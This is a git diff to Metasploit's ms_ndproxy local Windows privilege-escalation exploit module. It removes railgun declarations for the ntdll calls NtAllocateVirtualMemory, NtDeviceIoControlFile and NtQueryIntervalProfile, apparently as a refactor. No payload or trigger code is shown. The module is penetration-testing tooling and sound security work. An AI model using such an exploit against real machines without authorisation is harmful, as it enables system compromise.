diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index 0b9a32f593..1628c66f3d 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb @@ -87,44 +87,6 @@ class Metasploit3 < Msf::Exploit::Local end def add_railgun_functions - session.railgun.add_function( - 'ntdll', - 'NtAllocateVirtualMemory', - 'DWORD', - [ - ["DWORD", "ProcessHandle", "in"], - ["PBLOB", "BaseAddress", "inout"], - ["PDWORD", "ZeroBits", "in"], - ["PBLOB", "RegionSize", "inout"], - ["DWORD", "AllocationType", "in"], - ["DWORD", "Protect", "in"] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtDeviceIoControlFile', - 'DWORD', - [ - [ "DWORD", "FileHandle", "in" ], - [ "DWORD", "Event", "in" ], - [ "DWORD", "ApcRoutine", "in" ], - [ "DWORD", "ApcContext", "in" ], - [ "PDWORD", "IoStatusBlock", "out" ], - [ "DWORD", "IoControlCode", "in" ], - [ "LPVOID", "InputBuffer", "in" ], - [ "DWORD", "InputBufferLength", "in" ], - [ "LPVOID", "OutputBuffer", "in" ], - [ "DWORD", "OutPutBufferLength", "in" ] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtQueryIntervalProfile', - 'DWORD', - [ - [ "DWORD", "ProfileSource", "in" ], - [ "PDWORD", "Interval", "out" ] - ]) session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi') session.railgun.add_function( 'psapi',